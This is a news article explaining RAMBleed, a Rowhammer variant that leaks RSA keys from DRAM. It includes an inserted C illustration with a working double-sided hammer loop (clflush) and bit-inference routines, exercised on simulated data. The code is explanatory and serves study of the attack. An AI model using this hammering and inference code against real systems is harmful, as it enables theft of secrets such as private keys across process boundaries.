RAMBleed, new variant of the Rowhammer attack, steals information from RAM

A team of security researchers from Australia, Austria and the United States has published an investigation that reveals a new variant of the Rowhammer attack. First demonstrated in 2014, Rowhammer consists of accessing (activating) the same DRAM rows over and over; the repeated activations disturb the electrical charge of cells in physically adjacent rows, flipping data bits (0 to 1 or 1 to 0) and thereby corrupting information that the attacker never had write access to.

Unlike the original Rowhammer, which is an integrity attack (it corrupts data), this new variant, known as RAMBleed, breaks confidentiality: it uses the induced bit flips as a side channel to read information the attacker is not allowed to access. Over the years, experts have discovered many ways to trigger Rowhammer bit flips, but on this occasion the researchers worked out a sequence of steps to actively extract data from DRAM.

For this, the researchers had to devise and combine different techniques that, together, make the attack possible; among the necessary steps are:

  • The researchers found a way to abuse the Linux buddy memory allocator to obtain a large block of physically contiguous memory, so that the attacker knows which of its own pages share DRAM rows with each other
  • They then designed a new mechanism, called "Frame Feng Shui", to place the victim program's pages into physical frames chosen by the attacker, right next to the attacker's own rows
  • Finally, they developed a new way of arranging data in memory and hammering rows so that, instead of merely flipping bits, the attacker can deduce which data is stored in the neighbouring rows, exploiting the fact that whether a cell flips depends on the values held by the cells directly above and below it

In the layout described by the researchers, the attacker hammers rows A0 and A2, each of which holds an attacker-controlled (aggressor) page next to a page of the victim's "secret" data, and then inspects its own "sampling" page in row A1, which lies between them. Whether a given cell of the sampling page flips depends on the bits stored directly above and below it in A0 and A2, which belong to the victim.

By carefully arranging the data within the RAM in a layout of its choosing (for example, initialising cells known to be flippable to the value that flips), the attacker reads the secret one bit at a time from which cells flipped and which did not; since flips are probabilistic, the process is repeated and the results combined. As IICS experts note, by combining these techniques the researchers were able to extract a 2048-bit RSA private key from an OpenSSH server running on Linux.
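The following program is an added illustration of the two halves of a RAMBleed-style read described above (the double-sided hammering primitive and the inference from flips to victim bits); it is not the researchers' code. The hammer loop is real x86-64 code (repeated reads plus cache flushes so every access reaches DRAM), but finding aggressor addresses that map to rows adjacent to a victim page (the buddy-allocator and Frame Feng Shui steps) is out of scope here, so the inference step is exercised on constructed data. The data-dependence rule it assumes is a simplification: a cell that profiling marked as flippable (1 to 0) is taken to flip exactly when the victim bit directly above/below it is 0. The names `hammer_double_sided`, `find_flips`, `infer_bits`, `simulate_hammer` and `recover_byte` are hypothetical.

```c
/* Added example: RAMBleed-style read, simplified.  Not the RAMBleed authors' code. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__x86_64__) && (defined(__GNUC__) || defined(__clang__))
#include <emmintrin.h>          /* _mm_clflush */
#define HAVE_CLFLUSH 1
#endif

/* Double-sided hammer: a0 and a2 are addresses in the aggressor rows A0 and
 * A2; the sampling row A1 sits between them.  Hypothetical: the caller must
 * already know that a0 and a2 map to DRAM rows adjacent to the sampling page.
 * Each iteration activates both rows and flushes the lines from the cache so
 * the next read goes to DRAM again instead of being served from cache. */
static void hammer_double_sided(volatile const uint8_t *a0,
                                volatile const uint8_t *a2,
                                unsigned long iterations)
{
    for (unsigned long i = 0; i < iterations; i++) {
        (void)*a0;                          /* activate row A0 */
        (void)*a2;                          /* activate row A2 */
#ifdef HAVE_CLFLUSH
        _mm_clflush((const void *)a0);      /* evict so the read hits DRAM */
        _mm_clflush((const void *)a2);
#endif
    }
}

/* Diff the sampling page before/after hammering.  flipped[i] receives the
 * mask of bits that changed in byte i; the return value is the flip count. */
static size_t find_flips(const uint8_t *before, const uint8_t *after,
                         uint8_t *flipped, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        flipped[i] = (uint8_t)(before[i] ^ after[i]);
        for (uint8_t x = flipped[i]; x; x &= (uint8_t)(x - 1))
            n++;                            /* popcount */
    }
    return n;
}

/* Inference (simplified rule, see lead-in): for each cell that profiling
 * marked flippable (mask bit set) and that was initialised to 1, a flip means
 * the victim bit in the same column is 0 and no flip means it is 1.  Cells not
 * in the mask tell us nothing and are reported as -1.  out[] holds one entry
 * per bit (len * 8 entries); returns the number of bits recovered. */
static size_t infer_bits(const uint8_t *mask, const uint8_t *flipped,
                         size_t len, int8_t *out)
{
    size_t recovered = 0;
    for (size_t i = 0; i < len; i++) {
        for (int b = 0; b < 8; b++) {
            size_t idx = i * 8 + (size_t)b;
            if (!((mask[i] >> b) & 1)) { out[idx] = -1; continue; }
            out[idx] = ((flipped[i] >> b) & 1) ? 0 : 1;
            recovered++;
        }
    }
    return recovered;
}

/* Offline stand-in for the DRAM (constructed model, not a measurement): a
 * flippable cell initialised to 1 flips to 0 iff the victim bit is 0. */
static void simulate_hammer(const uint8_t *sampling_before, const uint8_t *mask,
                            const uint8_t *victim, uint8_t *sampling_after,
                            size_t len)
{
    for (size_t i = 0; i < len; i++)
        sampling_after[i] = (uint8_t)(sampling_before[i] & ~(mask[i] & ~victim[i]));
}

/* End-to-end demo on one byte: sampling cell initialised to all ones, hammered
 * (simulated), flips diffed, bits inferred.  Returns the reconstructed byte
 * with unrecoverable (unprofiled) positions set to 0. */
static uint8_t recover_byte(uint8_t victim, uint8_t mask)
{
    uint8_t before = 0xFF, after, flipped;
    int8_t bits[8];
    simulate_hammer(&before, &mask, &victim, &after, 1);
    find_flips(&before, &after, &flipped, 1);
    infer_bits(&mask, &flipped, 1, bits);
    uint8_t value = 0;
    for (int b = 0; b < 8; b++)
        if (bits[b] > 0) value |= (uint8_t)(1u << b);
    return value;
}

int main(void)
{
    /* Constructed victim byte and profiling masks; only profiled cells leak. */
    printf("all cells flippable : victim 0xA5 -> read 0x%02X\n", recover_byte(0xA5, 0xFF));
    printf("low nibble flippable: victim 0xA5 -> read 0x%02X\n", recover_byte(0xA5, 0x0F));
    /* The real primitive, run briefly on a local buffer: without row-adjacent
     * aggressor addresses this only demonstrates the access pattern. */
    static uint8_t buf[2 * 4096];
    hammer_double_sided(&buf[0], &buf[4096], 1000);
    return 0;
}
```

On real hardware the flips are noisy and rare, so an attack repeats the hammer/diff cycle and takes a majority vote per cell; that accumulation, and the memory massaging needed to put the victim's page next to the sampling page, are what the paper's buddy-allocator and Frame Feng Shui steps provide.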

Additional information on the RAMBleed attack, tracked as CVE-2019-0174, is available in the research published by the experts. The researchers recommend memory with Target Row Refresh (TRR) enabled, as found in DDR4 modules, as the main mitigation; they also report that ECC memory alone does not stop the attack, because the attacker only needs to learn whether a flip occurred in its own sampling page.